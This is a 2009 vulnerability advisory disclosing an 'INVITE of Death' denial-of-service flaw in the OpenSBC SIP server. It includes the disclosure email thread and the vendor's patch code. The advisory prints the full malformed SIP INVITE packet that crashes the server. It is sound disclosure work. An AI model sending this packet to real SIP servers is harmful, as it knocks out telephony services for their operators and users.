IMS - BISF (nexGIN RC)

The IMS Security Team

You are here: nexGIN RC → IMS Security Team → Vulnerabilities

OpenSBC (INVITE of Death)

Advisory Draft Date: 2nd Feburary, 2009.

Release Date: 16th Feburary, 2009.

Affected Application OpenSBC Server
Severity High
Status Disclosed
Reported To Joegen Baclor (CTO Solegy Systems)
Author M. Zubair Rafique and Dr. Muddassar Farooq

Background

OpenSBC is an ongoing attempt to create an open-source Session Border Controller that is fully compliant with the mandates of RFC 3261. OpenSBC can be used as a SIP router, media anchor for farend NAT traversal, SIP egress and ingress trunking among others. More information about the server can be found at http://opensipstack.org/

Overview

The INVITE of Death vulnerability in OpenSBC server allows the attacker to crash the server causing remote Denial of Service (DOS). The problem specifically exists in OpenSBC version 1.1.5-25 in the handling of “Via” field caused from maliciously crafted SIP packet.

Proof of Concept

The proof of concept code can be downloaded from here: OpenSBC.pl.
The malicious Packet on which the server crash is shown below:

INVITE sip:bob@open-ims.test SIP/2.0
Via:::::: SIP/2.0/UDP localhost.localdomain:5060;branch=z9hG4bK000000
From: 0 ;tag=0
To: Receiver
Call-ID: 0@localhost.localdomain
CSeq: 1 INVITE
Contact: 0
Expires: 1200
Max-Forwards: 70
Content-Type: application/sdp
Content-Length: 131
v=0
o=0 0 0 IN IP4 localhost.localdomain
s=Session SDP
c=IN IP4 127.0.0.1
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000

Work Around

The OpenSBC devolpment team has been reported about the vulnerability. Below is the E-mail exchange content between our research team and the CTO of Solegey Systems:

From:
This sender is DomainKeys verified
"Joegen Baclor" <joegen.baclor@gmail.com>

To:
m_zubair_rafique@yahoo.com, zubair.rafique@nexginrc.org, "Ali Akbar" <ali.akbar@nexginrc.org>

The current version in CVS for OpenSBC is 1.1.5-82 and 1.1.13-17 for OpenSIPStack.  The fix is really very simple.  I just made sure that leading colons in the header name and trailing colons in the header values are stripped when parsing MIME.  Attached is the function call.
 
----

void ParserTools::SliceMIME(

const OString & mime,

OString & name,

OString & value

)

{

if( mime.IsEmpty() )

return;

PINDEX colon = mime.Find( ": " );

if( colon != P_MAX_INDEX )

{

name = mime.Left( colon );

value = mime.Mid( colon + 2 );

}else

{

colon = mime.Find( ":" );

if( colon != P_MAX_INDEX )

{

name = mime.Left( colon );

if( ParserTools::IsKnownHeader( name ) )

value = mime.Mid( colon + 1 );

else

{

name = "";

value = mime;

}

}else

{

value = mime;

}

if( !value.IsEmpty() )

{

/// strip leading colons from value

int leadingColons = 0;

for( int i = 0; i < value.GetLength(); i++ )

{

if( value[i] == ':' )

leadingColons++;

else

break;

}

if( leadingColons > 0 )

value = value.Mid( leadingColons );

}

if( !name.IsEmpty() )

{

///strip trailing colons from name

int trailingColons = 0;

for( int i = name.GetLength() - 1; i >= 0 ; i-- )

{

if( name[i] == ':' )

trailingColons++;

else

break;

}

if( trailingColons > 0 )

name = name.Left( name.GetSize() - trailingColons - 1 );

}

From: zubair rafique
Sent: Friday, February 13, 2009 6:30 PM
To: zubair.rafique@nexginrc.org ; Ali Akbar ; Joegen Baclor
Subject: Re: Urgent: OpenSBC information request for vulnerabilitydisclosure

Dear Jogen,
 
We are grateful of having your feed back on the issue. As we are team of research engineers working on SIP servers (IMS Security) we believe that your coordination in this regard will be helpful for our research.
 
Kindly provide me the release version number of OpenSBC in which the issue has been fixed. I will appreciate it if you could provide us the technical inside of the bug. This will help us in the disclosure of vulnerability and its remedy done by your team.
 
Thank you for coordinating with us.
 
 
Zubair Rafique

--- On Fri, 2/13/09, Joegen Baclor <joegen.baclor@gmail.com> wrote:

From: Joegen Baclor <joegen.baclor@gmail.com>
    Subject: Re: Urgent: OpenSBC information request for vulnerabilitydisclosure
    To: zubair.rafique@nexginrc.org, "Ali Akbar" <ali.akbar@nexginrc.org>
    Date: Friday, February 13, 2009, 12:00 PM

Hi the issue is now fixed in OpenSBC CVS.   Anything, you need me to provide
    aside from patching our software?

--------------------------------------------------
    From: <zubair.rafique@nexginrc.org>
    Sent: Friday, February 13, 2009 3:51 AM
    To: "Ali Akbar" <ali.akbar@nexginrc.org>
    Cc: "Joegen Baclor" <joegen.baclor@gmail.com>
    Subject: Re: Urgent: OpenSBC information request for vulnerabilitydisclosure

> Dear Jogen,
    > 
    > As my colleague Ali Akbar has sent you the mail regarding  vulnerability
    in OpenSBC. This email is reminder, in order to ensure  coordination from your
    side regarding the issue.
    > 
    > Regards
    > 
    > Zubair Rafique
    > 
    > Quoting Ali Akbar <ali.akbar@nexginrc.org>:
    > 
    >> Dear Joegen,
    >> 
    >> I am attaching the vulnerability advisory (VA-nexGINRC-2009-01) and
    Proof of
    >> Concept (Poc) script with this email. The advisory and PoC are
    confidential,
    >> and have not been disclosed to anyone outside the project team. This
    >> material should enable you to reproduce the server crash scenario on
    your
    >> testbed.
    >> 
    >> We hope to include the description of the vulnerability as an example
    of SIP
    >> servers' vulnerability to parsing attacks. The deadline of paper
    submission
    >> is 16 Feb 2009. We hope that you get back to us with feedback
    regarding the
    >> issue.
    >> 
    >> Please feel free to contact us regarding any query.
    >> 
    >> Regards,
    >> M. Ali Akbar
    >> 
    >> On Tue, Jan 27, 2009 at 7:37 AM, Joegen Baclor
    <joegen.baclor@gmail.com>wrote:
    >> 
    >>> Hi Ali,
    >>> 
    >>> My name is Joegen Baclor and I am the developer of OpenSBC.  You
    can
    >>> correspond with me regarding the vulnerability using the e-mail
    address.
    >>> 
    >>> Joegen
    >>> 
    >>> --------------------------------------------------
    >>> From: <ali.akbar@nexginrc.org>
    >>> Sent: Monday, January 26, 2009 4:27 PM
    >>> To: <joegen@opensipstack.org>; <rdiola@solegy.com>
    >>> Subject: Urgent: OpenSBC information request for vulnerability
    disclosure
    >>> 
    >>>  Dear All,
    >>>> 
    >>>> We are currently working on security assessment of different
    publicly
    >>>> availbale SIP servers. OpenSBC is included in the list of
    selected SIP
    >>>> servers/proxies. During one of our experiments, we found that
    OpenSBC
    >>>> server is vulnerable to a remote DoS exploit. We are eager to
    share
    >>>> more information about the exploit with the developer of
    OpenSBC. We
    >>>> are also willing to provide assisstance in creation and
    testing of the
    >>>> patch.
    >>>> 
    >>>> We need the contact email address of the developer or the
    concerned
    >>>> person. Your help in this regard is highly appreciated.
    >>>> 
    >>>> 
    >>>> About Me:
    >>>> I am a research engineer at Next Generation Intelligent
    Networks
    >>>> Research Center (nexGIN RC). We are currently working on a
    research
    >>>> project that deals with the security of IP Multimedia
    Subsystem (IMS).
    >>>> You can find more information about our project at our website
    >>>> http://www.nexginrc.org/
    >>>> 
    >>>> Regards,
    >>>> Ali
    >>>> 
    >>>> 
    >>>> 
    >>> 
    >>> 
    >>> 
    >>>> No virus found in this incoming message.
    >>>> Checked by AVG - http://www.avg.com
    >>>> Version: 8.0.176 / Virus Database: 270.10.13/1915 - Release
    Date:
    >>>> 1/25/2009 6:13 PM
    >>>> 
    >>>> 
    >> 
    > 
    >

Credits

The vulnerability was discovered by Zubair Rafique and Sohail Aziz from the IMS security research project team.

Contact

M. Zubair Rafique                       M. Ali Akbar
Zubair.rafique@nexginrc.org       ali.akbar@nexginrc.org
+92-346-5356929                     +92-321-2936105

OpenSBC (INVITE of Death)

Background

Overview

Proof of Concept

Work Around

Credits

Contact

Disclaimer